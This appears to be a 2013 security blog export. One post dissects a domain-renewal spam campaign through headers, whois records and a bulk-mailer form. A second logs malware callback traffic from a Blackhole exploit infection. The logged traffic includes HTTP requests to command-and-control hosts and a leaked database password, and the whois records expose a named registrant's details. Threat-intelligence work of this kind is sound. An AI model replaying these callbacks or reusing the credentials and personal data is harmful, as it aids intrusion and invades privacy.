<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiYm68-XNfhRJxam7xmVutGVi51iK0rK84BokZDMIWkPVQUEx6556R5vHU5eq4lROPbnmpJ5fJGKvgD8slGZmwpxLy_y4MKKbmCNVs-4kHKEg_ttE2sT41Pn11hVSC2F_w7dzlI1OE2uc/s1600/domain-renewal-disclaimer.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="74" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiYm68-XNfhRJxam7xmVutGVi51iK0rK84BokZDMIWkPVQUEx6556R5vHU5eq4lROPbnmpJ5fJGKvgD8slGZmwpxLy_y4MKKbmCNVs-4kHKEg_ttE2sT41Pn11hVSC2F_w7dzlI1OE2uc/s640/domain-renewal-disclaimer.PNG" width="640" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGYCz22V4qm4iy_wwT4UQwp5G2k-TzEErua5I55vg98h2qpn8Q7VLKcv03KqOR3GrTg6g0IU5lgi52Ln22aHePlF3mOQe38nAlSpHm2XCTU_8-yC_J38EUdNyxZrJLxObcptTBzoI-O24/s1600/domain-renewal-junk-ip-lookup.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGYCz22V4qm4iy_wwT4UQwp5G2k-TzEErua5I55vg98h2qpn8Q7VLKcv03KqOR3GrTg6g0IU5lgi52Ln22aHePlF3mOQe38nAlSpHm2XCTU_8-yC_J38EUdNyxZrJLxObcptTBzoI-O24/s1600/domain-renewal-junk-ip-lookup.PNG" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
So this hostname, email2u.us comes back to a Romanian registration. Probably nothing suspicious here #scoff</div>
<br />
<br />
<span style="color: red;"><br /></span>
<br />
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">Return-path: <domainservicb73@hotmail.com></span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">Envelope-to: receiver@domain.com</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">Delivery-date: Sat, 27 Apr 2013 18:54:15 -0500</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">Received: from [<b>184.82.95.130</b>] (port=41871 helo=<b>host.kevinz.com</b>)</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;"> <span class="Apple-tab-span" style="white-space: pre;"> </span>by hosteddomain.com with esmtps (TLSv1:DHE-RSA-AES256-SHA:256)</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;"> <span class="Apple-tab-span" style="white-space: pre;"> </span>(Exim 4.80)</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;"> <span class="Apple-tab-span" style="white-space: pre;"> </span>(envelope-from <<b>domainservicb73@hotmail.com</b>>)</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;"> <span class="Apple-tab-span" style="white-space: pre;"> </span>id 1UWEwY-0001rX-K2</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;"> <span class="Apple-tab-span" style="white-space: pre;"> </span>for receiver@domain.com; Sat, 27 Apr 2013 18:54:15 -0500</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">Received: from <b>domainin</b> by h<b>ost.kevinz.com with local <a href="http://www.exim.org/">(Exim 4.80</a>)</b></span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;"> <span class="Apple-tab-span" style="white-space: pre;"> </span>(envelope-from <domainservicb73@hotmail.com>)</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;"> <span class="Apple-tab-span" style="white-space: pre;"> </span>id 1UWEwN-000189-VO</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;"> <span class="Apple-tab-span" style="white-space: pre;"> </span>for receiver@domain.com; Sat, 27 Apr 2013 19:54:04 -0400</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">To: receiver@domain.com</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">Subject: Domain Notification: JOE CITIZEN This is your Final Notice of Domain Listing - domain.com</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;"><b>X-PHP-Script: 184.82.95.130/~domainin/info/mail_new2.php for 99.247.101.189 </b></span><br />
<span style="font-family: Verdana, Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Verdana, Arial, Helvetica, sans-serif;">(the php script seems to be common in these messages and the 99. address is a Canadia address)</span><br />
<div style="color: #a83600;">
<span style="font-family: Verdana, Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">From: Domain Services <domainservicb73@hotmail.com></span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">MIME-Version: 1.0</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">Content-Type: text/html;</span></div>
<span style="font-family: Verdana, Arial, Helvetica, sans-serif;"><b><span style="color: #a83600;"><br /></span></b></span>
<span style="font-family: Verdana, Arial, Helvetica, sans-serif;"><b><span style="color: red;">X-Mailer: AT</span><span style="color: #a83600;"> </span>(undocumented X-mailer, seems to be a common string in these messages, see References)</b></span><br />
<div style="color: #a83600;">
<span style="font-family: Verdana, Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">Priority: High</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">Importance: High</span></div>
<span style="font-family: Verdana, Arial, Helvetica, sans-serif;"><b><span style="color: #a83600;"><br /></span></b></span>
<span style="font-family: Verdana, Arial, Helvetica, sans-serif;"><b><span style="color: #a83600;">Precedence: VBBV </span>(not generally used, see <a href="http://stackoverflow.com/questions/154718/precedence-header-in-email">This</a> and <a href="http://www.faqs.org/rfcs/rfc2076.html">RFC 2076</a> - <i>The Precedence in these messages appears always to be a 4 Letter Upper Case Code - might be good intelligence spam blockers to check for</i>)</b></span><br />
<div style="color: #a83600;">
<span style="font-family: Verdana, Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">Message-Id: <E1UWEwN-000189-VO@host.kevinz.com></span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">Date: Sat, 27 Apr 2013 19:54:03 -0400</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">X-AntiAbuse: This header was added to track abuse, please include it with any abuse report</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">X-AntiAbuse: Primary Hostname - host.kevinz.com</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">X-AntiAbuse: Original Domain - domain.com</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">X-AntiAbuse: Originator/Caller UID/GID - [500 501] / [47 12]</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">X-AntiAbuse: Sender Address Domain - hotmail.com</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">X-Get-Message-Sender-Via: host.kevinz.com: authenticated_id: domainin/only user confirmed/virtual account not confirmed</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">X-Spam-Status: No, score=5.2</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">X-Spam-Score: 52</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">X-Spam-Bar: +++++</span></div>
<div>
<span style="color: red; font-family: Verdana, Arial, Helvetica, sans-serif;">X-Spam-Flag: NO</span></div>
<br />
<br />
<h3>
<b>Common Strings:</b></h3>
<br />
<ul>
<li>X-Mailer: AT</li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Precendence: (followed by a 4 Upper Case Letter Code)</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">/~domainin/info/mail_new2.php for </span><span style="font-family: Arial, Helvetica, sans-serif;"><ip address></span></li>
</ul>
<br />
Some digging around revealed some leaked information on the server, which is publicly accessible. This is a list of the "csv" files which have been uploaded to the server.<br />
<br />
<br />
<h3>
<b>Information Leakage in HTML Files:</b></h3>
<br />
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 14px;">A host of csv files are leaked and identified on this server, including the following:</span></span><br />
<span style="color: #a83600; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 14px;"><br /></span></span>
<br />
<pre style="margin-left: 10px; margin-right: 10px; margin-top: 2px; padding: 0px;"><span style="font-family: DejaVu Sans Mono, Courier New, Courier, Monaco, monospace;"><span style="font-size: 12px;">30mil_com-6-23.csv </span></span></pre>
<pre style="margin-left: 10px; margin-right: 10px; margin-top: 2px; padding: 0px;"><span style="font-family: DejaVu Sans Mono, Courier New, Courier, Monaco, monospace;"><span style="font-size: 12px;">30mil_com-6-24.csv </span></span></pre>
<pre style="margin-left: 10px; margin-right: 10px; margin-top: 2px; padding: 0px;"><span style="font-family: DejaVu Sans Mono, Courier New, Courier, Monaco, monospace;"><span style="font-size: 12px;">30mil_com-6-25.csv </span></span></pre>
<pre style="margin-left: 10px; margin-right: 10px; margin-top: 2px; padding: 0px;"><span style="font-family: DejaVu Sans Mono, Courier New, Courier, Monaco, monospace;"><span style="font-size: 12px;">30mil_com-6-26.csv </span></span></pre>
<pre style="margin-left: 10px; margin-right: 10px; margin-top: 2px; padding: 0px;"><span style="font-family: DejaVu Sans Mono, Courier New, Courier, Monaco, monospace;"><span style="font-size: 12px;">30mil_com-6-27.csv </span></span></pre>
<pre style="margin-left: 10px; margin-right: 10px; margin-top: 2px; padding: 0px;"><span style="font-family: DejaVu Sans Mono, Courier New, Courier, Monaco, monospace;"><span style="font-size: 12px;">30mil_com-6-28.csv </span></span></pre>
<pre style="margin-left: 10px; margin-right: 10px; margin-top: 2px; padding: 0px;"><span style="font-family: DejaVu Sans Mono, Courier New, Courier, Monaco, monospace;"><span style="font-size: 12px;">30mil_com-6-29.csv </span></span></pre>
<pre style="margin-left: 10px; margin-right: 10px; margin-top: 2px; padding: 0px;"><span style="font-family: DejaVu Sans Mono, Courier New, Courier, Monaco, monospace;"><span style="font-size: 12px;">30mil_com-6-30.csv </span></span></pre>
<pre style="margin-left: 10px; margin-right: 10px; margin-top: 2px; padding: 0px;"><span style="font-family: DejaVu Sans Mono, Courier New, Courier, Monaco, monospace;"><span style="font-size: 12px;">30mil_com-6-31.csv </span></span></pre>
<pre style="margin-left: 10px; margin-right: 10px; margin-top: 2px; padding: 0px;"><span style="font-family: DejaVu Sans Mono, Courier New, Courier, Monaco, monospace;"><span style="font-size: 12px;">30mil_com-6-32.csv </span></span></pre>
<pre style="margin-left: 10px; margin-right: 10px; margin-top: 2px; padding: 0px;"><span style="font-family: DejaVu Sans Mono, Courier New, Courier, Monaco, monospace;"><span style="font-size: 12px;">30mil_com-6-33.csv</span></span></pre>
<pre style="margin-left: 10px; margin-right: 10px; margin-top: 2px; padding: 0px;"><span style="font-family: DejaVu Sans Mono, Courier New, Courier, Monaco, monospace;"><span style="font-size: 12px;">
</span></span></pre>
<pre style="margin-left: 10px; margin-right: 10px; margin-top: 2px; padding: 0px;"><span style="font-family: DejaVu Sans Mono, Courier New, Courier, Monaco, monospace;"><span style="font-size: 12px;">
</span></span></pre>
<span style="font-family: Arial, Helvetica, sans-serif;">and there are a bunch more files like this. Nothing beats having 30 million+ emails to choose from.</span><br />
<br />
<h3>
184.82.95.130 Services</h3>
PORT STATE SERVICE VERSION<br />
53/tcp open domain ISC BIND 9.3.6-20.P1.el5_8.6<br />
1723/tcp closed pptp<br />
Device type: general purpose|firewall|proxy server|WAP<br />
<br />
<br />
FYI: <a href="http://www.cvedetails.com/vulnerability-list/vendor_id-64/product_id-144/version_id-21860/ISC-Bind-9.3.0.html">http://www.cvedetails.com/vulnerability-list/vendor_id-64/product_id-144/version_id-21860/ISC-Bind-9.3.0.html</a><br />
<br />
<span style="background-color: #367e8e; color: white; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; font-style: italic;">Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at 184.82.95.130 Port 80</span><br />
<span style="background-color: #367e8e; color: white; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; font-style: italic;"><br /></span>
<br />
<h3>
<b>Information Leakage in Error Message:</b></h3>
<div>
<pre style="font-family: 'DejaVu Sans Mono', 'Courier New', Courier, Monaco, monospace; font-size: 12px; margin-left: 10px; margin-right: 10px; margin-top: 2px; padding: 0px;"><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[LF]</span>
<h1>404 Not Found</h1><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[LF]</span>
Please forward this error screen to 184.82.95.130's <span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[LF]</span>
<a href="<b>mailto:kevinz50@ymail.com</b>
WebMaster</a>.<span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[LF]</span>
</p><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[LF]</span></pre>
</div>
<h3>
<b><br /></b></h3>
<h3>
<b>Centralops on email2u.us</b></h3>
<br />
<pre style="font-family: 'Courier New', monospace;"><span style="font-size: x-small;">Domain Name: EMAIL2U.US
Domain ID: D35316435-US
Sponsoring Registrar: ENOM, INC.
Sponsoring Registrar IANA ID: 48
Registrar URL (registration services): whois.enom.com
Domain Status: clientTransferProhibited
Registrant ID: 62EA327952C1BCAB
Registrant Name: Andrei Manoliu
Registrant Address1: atelierele noi
Registrant City: bucharest
Registrant State/Province: bucuresti
Registrant Postal Code: 014571
</span><b>Registrant Country: Romania
Registrant Country Code: RO</b><span style="font-size: x-small;">
Registrant Phone Number: +40.767801428
Registrant Email: slabeste2011@yahoo.com
Registrant Application Purpose: P1
Registrant Nexus Category: C12
Administrative Contact ID: EDAECA2EE634C95B
Administrative Contact Name: Andrei Manoliu
Administrative Contact Address1: atelierele noi
Administrative Contact City: bucharest
Administrative Contact State/Province: bucuresti
Administrative Contact Postal Code: 014571
Administrative Contact Country: Romania
Administrative Contact Country Code: RO
Administrative Contact Phone Number: +40.767801428
Administrative Contact Email: slabeste2011@yahoo.com</span></pre>
<br />
<br />
<h3>
<b>BMX Mailer</b></h3>
<br />
<br />
<pre style="font-family: 'DejaVu Sans Mono', 'Courier New', Courier, Monaco, monospace; font-size: 12px; margin-left: 10px; margin-right: 10px; margin-top: 2px; padding: 0px;"><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<html><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<head><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<span class="ctrlchar" style="color: darkgrey; display: inline;" title="Tab">→ </span><title>BMX : Bulk Mailer</title><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
</head><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<body><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<form name="mail" method="post" action="mail_new2.php"><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<table width="60%" border="0" cellspacing="1" cellpadding="1" align="center" bgcolor=#DCDCDC><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<tr><td colspan=2><font face=arial size=2><strong>Bulk Mailer</strong></font></td></tr><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<tr> <span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<td align="right"><font face="Arial, Helvetica, sans-serif" size="2">Subject:</font></td><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<td> <span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<span class="ctrlchar" style="color: darkgrey; display: inline;" title="Tab">→ </span><span class="ctrlchar" style="color: darkgrey; display: inline;" title="Tab">→ </span><select size="1" name="subjectid" style="width:250"><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<span class="ctrlchar" style="color: darkgrey; display: inline;" title="Tab">→ </span><span class="ctrlchar" style="color: darkgrey; display: inline;" title="Tab">→ </span><span class="ctrlchar" style="color: darkgrey; display: inline;" title="Tab">→ </span><span class="ctrlchar" style="color: darkgrey; display: inline;" title="Tab">→ </span><option value="">-- Select -- <span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<span class="ctrlchar" style="color: darkgrey; display: inline;" title="Tab">→ </span><span class="ctrlchar" style="color: darkgrey; display: inline;" title="Tab">→ </span><span class="ctrlchar" style="color: darkgrey; display: inline;" title="Tab">→ </span><span class="ctrlchar" style="color: darkgrey; display: inline;" title="Tab">→ </span><option value=1><b><span style="color: red;">Domain Notification: {NAME} This is your Final Notice of Domain Listing - {WEBURL}<span class="ctrlchar" style="color: darkgrey; display: inline;" title="Tab">→ </span><span class="ctrlchar" style="color: darkgrey; display: inline;" title="Tab">→ </span><span class="ctrlchar" style="color: darkgrey; display: inline;" title="Tab">→ </span><span class="ctrlchar" style="color: darkgrey; display: inline;" title="Tab">→ </span></select><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span></span></b>
</td><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
</tr><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<tr><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<td align=right><font face=arial size=2>Select Group:</font></td><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<td><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<select name="groupid"><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<option value=0>-- Select --<span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
<option value=1>Domain Services</select><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span>
</td><span class="crlf" style="color: darkgrey; display: inline; font-size: 10px; font-weight: bold;">[CRLF]</span></pre>
<br />
<h3>
Others have gotten this and posted their headers. </h3>
<br />
<br />
From - Fri Mar 22 17:28:39 2013<br />
X-Account-Key: account2<br />
X-UIDL: 12219<br />
X-Mozilla-Status: 0001<br />
X-Mozilla-Status2: 00010000<br />
X-Mozilla-Keys:<br />
Return-Path: domainserhhjcb73@hotmail.com<br />
Received: from spoolbl10-d.mail.gandi.net ([217.70.178.90])<br />
by mail.brakstar.com<br />
; Fri, 22 Mar 2013 17:24:00 +0100<br />
Received: from mxcontact.gandi.net (mxcontact.gandi.net [217.70.177.36])<br />
by spoolbl10-d.mail.gandi.net (Postfix) with ESMTP id 0D8E795AE38<br />
for <societe@brakstar.com>; Fri, 22 Mar 2013 17:23:55 +0100 (CET)<br />
Received: from server1.ryansheppard.com (unknown [209.198.1.90])<br />
by mredir1-v.mgt.gandi.net (Postfix) with ESMTP id 4544EEC40A<br />
for <8493FD79D2F73DED5468744CAF859FE6-763727@CONTACT.GANDI.NET>; Fri, 22 Mar 2013 17:23:55 +0100 (CET)<br />
Received: from domainin by server1.ryansheppard.com with local (Exim 4.80)<br />
(envelope-from <domainserhhjcb73@hotmail.com>)<br />
id 1UIy2y-00032y-JH<br />
for 8493FD79D2F73DED5468744CAF859FE6-763727@CONTACT.GANDI.NET; Fri, 22 Mar 2013 05:14:00 -0400<br />
To: 8493FD79D2F73DED5468744CAF859FE6-763727@CONTACT.GANDI.NET<br />
Subject: Domain Notification: SARL BRAKSTAR This is your Final Notice of Domain Listing - RATONIA.COM<br />
<br />
X-PHP-Script: 209.198.1.90/~domainin/info/mail_new2.php for 99.237.121.36 (Again Canadian IP Address)<br />
<br />
From: Domain Services <domainserhhjcb73@hotmail.com><br />
MIME-Version: 1.0<br />
Content-Type: text/html;<br />
<br />
X-Mailer: AT<br />
<br />
Priority: High<br />
Importance: High<br />
<br />
Precedence: SSWD<br />
<br />
Message-Id: <E1UIy2y-00032y-JH@server1.ryansheppard.com><br />
Date: Fri, 22 Mar 2013 05:14:00 -0400<br />
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report<br />
X-AntiAbuse: Primary Hostname - server1.ryansheppard.com<br />
X-AntiAbuse: Original Domain - contact.gandi.net<br />
X-AntiAbuse: Originator/Caller UID/GID - [500 501] / [47 12]<br />
X-AntiAbuse: Sender Address Domain - hotmail.com<br />
X-Get-Message-Sender-Via: server1.ryansheppard.com: authenticated_id: domainin/only user confirmed/virtual account not confirmed<br />
X-Antivirus: avast! (VPS 130322-0, 22/03/2013), Inbound message<br />
X-Antivir<br />
<div>
<br /></div>
<br />
<br />
References:<br />
<a href="http://www.spamreg.com/reg495597.htm">http://www.spamreg.com/reg495597.htm</a><br />
<a href="http://www.ip-adress.com/whois/kevinz.com">http://www.ip-adress.com/whois/kevinz.com</a><br />
<a href="http://www.holmpage.com/2011/10/spam-alert-domain-notification-this-is-your-final-notice-of-domain-listing/">http://www.holmpage.com/2011/10/spam-alert-domain-notification-this-is-your-final-notice-of-domain-listing/</a><br />
<a href="http://www.webx.net/bmx/">http://www.webx.net/bmx/</a><br />
<a href="http://www.brakstar.com/forum/braktopic_22844.html">http://www.brakstar.com/forum/braktopic_22844.html</a><br />
<a href="http://www.elvey.com/spam/Domain_Services.html">http://www.elvey.com/spam/Domain_Services.html</a><br />
<br />Fort Knox Networkshttp://www.blogger.com/profile/12394479781465013402noreply@blogger.com2tag:blogger.com,1999:blog-407866255126559296.post-36110953205719989962013-04-21T15:13:00.000-07:002013-04-22T16:34:11.044-07:00FTP JPG EXE as a Second StageSomething somewhat interesting. Blackhole exploit at<br />
<br />
<br />
<pre class="dualColTextStyle" hasbox="2"><span style="color: red;"> GET /forum/links/public_version.php?yf=30:31:32:2v:1f&qe=2v:1k:1m:32:33:1k:1k:31:
1j:1o&u=1f&hs=w&yy=e&jopa=6797956 HTTP/1.1
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_29
Host: jindalo.ru:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive</span></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"><table style="background-color: white; border-collapse: collapse; border-spacing: 0px; color: #333333; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 8px; margin-left: 8px; max-width: 100%;"><tbody>
<tr><td style="padding: 8px 10px 9px;">SHA256:</td><td style="padding: 8px 10px 9px;">5f22da4c9ace64d97bc5d3107eaaca8cf1b88da61bd173996f839e88222f4257</td></tr>
<tr><td style="padding: 8px 10px 9px;">File name:</td><td style="padding: 8px 10px 9px;">blackhole.exe</td></tr>
<tr><td style="padding: 8px 10px 9px;">Detection ratio:</td><td class="
text-red " style="color: rgb(180, 12, 26) !important; padding: 8px 10px 9px;">1 / 46</td></tr>
<tr><td style="padding: 8px 10px 9px;">Analysis date:</td><td style="padding: 8px 10px 9px;">2013-04-21 21:37:27 UTC ( 0 minutes ago )</td></tr>
</tbody></table>
</pre>
<pre class="dualColTextStyle" hasbox="2"><a href="https://www.virustotal.com/en/file/5f22da4c9ace64d97bc5d3107eaaca8cf1b88da61bd173996f839e88222f4257/analysis/1366580247/">https://www.virustotal.com/en/file/5f22da4c9ace64d97bc5d3107eaaca8cf1b88da61bd173996f839e88222f4257/analysis/1366580247/</a></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">Ok, nothing new here. Whatever. Thanks for exploiting my Java. Strings is all garbage, Peid balked.</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">1,400+ UDP 16471 ala ZeroAccess in like 20 minutes and an interesting one on 55755.</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"><span style="color: red;"> GET /app/geoip.js HTTP/1.0
Host: j.maxmind.com
Connection: close</span>
</pre>
<pre class="dualColTextStyle" hasbox="2">Ok, nothing new here. I'm located in Boca Raton playing golf with Tiger Woods, how did you guess?</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">__________________________________________</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"><span style="color: red;">POST /10qVeAAAA/ebH7oAAAAA/rDhlJAA/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 88.191.130.98:8080
Content-Length: 339
Connection: Keep-Alive
Cache-Control: no-cache</span>
</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">IP Seen on URL Query: <a href="http://urlquery.net/report.php?id=1768644">http://urlquery.net/report.php?id=1768644</a></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">__________________________________________</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"><span style="color: red;">POST /asp/intro.php HTTP/1.0
Host: 111.68.142.223
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 269
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)</span></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">User agent is a big indicator here. Somewhat interesting, documented by #MalwareMustDie <a href="http://malwaremustdie.blogspot.com/2012/12/the-crime-still-goes-on-trojan-parfeit.html">http://malwaremustdie.blogspot.com/2012/12/the-crime-still-goes-on-trojan-parfeit.html</a></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">Consistent with Trojan Fareit callbacks <Hat Tip MalwareMustDie>, but no botid url following this.</pre>
<pre class="dualColTextStyle" hasbox="2">__________________________________________</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">This one looks interesting. <b>Using Bit.ly</b>, but a 301 to google put the kabash on this one. </pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"><span style="color: red;"><b>POST /YddCcn? HTTP/1.1</b>
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Accept: */*
<b>User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)</b><span id="goog_291860309"></span><span id="goog_291860310"></span><a href="http://www.blogger.com/"></a>
<b>Host: bit.ly</b>
Connection: Keep-Alive
<b>op=IncluirAvisos&HostBD=dbmy0060%2Ewhservidor%2Ecom&SenhaBD=delphi2020&UsuarioBD=
turckatty_2&DatabaseBD=turckatty_2&sgdb=</b></span></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">Well the user agent is known badness: <a href="http://www.secureworks.com/cyber-threat-intelligence/threats/visal-b/">here</a> and <a href="https://dylansserver.com/note/malware_analysis">here</a> dating back to 2010.</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"><span style="color: red;"> GET /WggQJ3RVGrKgdj0xLjImaWQ9NDIzODYxMDcxNiZhaWQ9MzA1NjImc2lkPTAmb3M9NS4xLTMyGuzZ
0s7u HTTP/1.0
Host: xlotxdxtorwfmvuzfuvtspel.com
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Accept-Language: en-us
Connection: close</span></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
